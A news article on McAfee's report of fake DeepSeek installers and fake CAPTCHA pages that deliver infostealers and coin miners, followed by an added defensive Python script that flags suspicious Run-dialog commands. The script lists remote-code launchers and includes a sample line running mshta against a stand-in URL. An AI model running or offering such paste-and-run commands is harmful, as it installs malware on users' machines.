Fake DeepSeek installers are infecting your device with dangerous malware
Hackers are abusing the fact DeepSeek is also available as a downloadable app

- McAfee's researchers find a "cocktail" of malware hiding behind fake DeepSeek apps
- The campaign preys on people searching for the generative AI tool
- Infostealers, crypto miners, and more, are being deployed this way
The hype around DeepSeek is the next big thing cybercriminals are exploiting in their hacking campaigns, researchers from McAfee Labs are saying.
The team has outlined how they saw cybercriminals setting up various websites, offering different versions of DeepSeek for download. Victims would reach these websites through search engines, meaning that some SEO poisoning was involved in the campaign, as well.
When they reach the websites and download the software, the victims are infected with a “cocktail of malware”, ranging from keyloggers and password stealers, to coin miners. These malware variants can steal sensitive information (including banking credentials and cryptocurrency wallet information), and can force the infected computer to mine cryptocurrency, rendering it useless for pretty much anything else.
Fake CAPTCHA
On some websites, victims are invited to download a DeepSeek app or program; on others, the devil is in the CAPTCHA.
In some cases observed by McAfee, victims would visit a website with a CAPTCHA that can be “solved” by copying and pasting a command into the Run program on Windows. This command just downloads and runs a malware dropper.
To stay safe, you should stay vigilant at all times. Instead of “googling” for something, visit the website directly, and if you don’t know the address, scrutinize every link returned by the search engine.
Furthermore, a real CAPTCHA will never ask you to paste a command into the Run program.
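For defenders triaging a machine after a suspected fake-CAPTCHA visit, Windows keeps commands typed into the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The sketch below is an added example, not code from McAfee or from the original article; the heuristics, function names and sample values are assumptions constructed for illustration.

```python
import re

# Heuristics below are assumptions for this example, not taken from McAfee's report.
# Programs that can fetch or run remote content when started from Win+R.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|curl|certutil|bitsadmin|msiexec|wscript|cscript)(?:\.exe)?\b",
    re.IGNORECASE,
)
URL = re.compile(r"https?://[^\s\"'|)]+", re.IGNORECASE)
# PowerShell's -WindowStyle Hidden, including abbreviated forms such as "-w hidden".
HIDDEN = re.compile(r"\s-w(?:in\w*)?\s+h(?:id\w*)?\b", re.IGNORECASE)

def run_history(values):
    """Return Run-dialog commands from RunMRU values, most recent first."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is None:
            continue  # MRUList can reference a value that was deleted
        # Explorer stores each entry with a trailing "\1" marker.
        commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def assess(command):
    """Return the reasons a Run-dialog command looks like a paste-and-run lure."""
    reasons = []
    launcher = LAUNCHERS.search(command)
    url = URL.search(command)
    if launcher and url:
        reasons.append(f"{launcher.group(1).lower()} given remote URL {url.group(0)}")
    if launcher and HIDDEN.search(command):
        reasons.append("window hidden from the user")
    return reasons

def triage(values):
    """Map each suspicious command in the Run history to its reasons."""
    return {c: r for c in run_history(values) if (r := assess(c))}

# Constructed sample of one user's RunMRU values (not real telemetry).
SAMPLE_RUNMRU = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "https://www.example.com\\1",   # bare URL: opens the browser, not flagged
    "c": "powershell\\1",                 # interpreter alone: not flagged
    "d": "mshta https://captcha-check.example.invalid/verify\\1",
}

if __name__ == "__main__":
    for command, reasons in triage(SAMPLE_RUNMRU).items():
        print(command, "->", "; ".join(reasons))
```

On a live system the `values` dictionary would be filled from the registry key above for each user profile; a hit is a lead for investigation, not proof of infection.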
Hackers are known for tapping into current trends to distribute malware. Similar campaigns were observed when ChatGPT was first released, both for Windows and Android.
Major events, such as Black Friday and Cyber Monday, the Olympic Games, the World Cup, and others, have all been abused in the past. The Covid-19 outbreak, the Russo-Ukrainian war, and the US presidential elections all served as platforms for information theft, malware distribution, and wire fraud.
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

















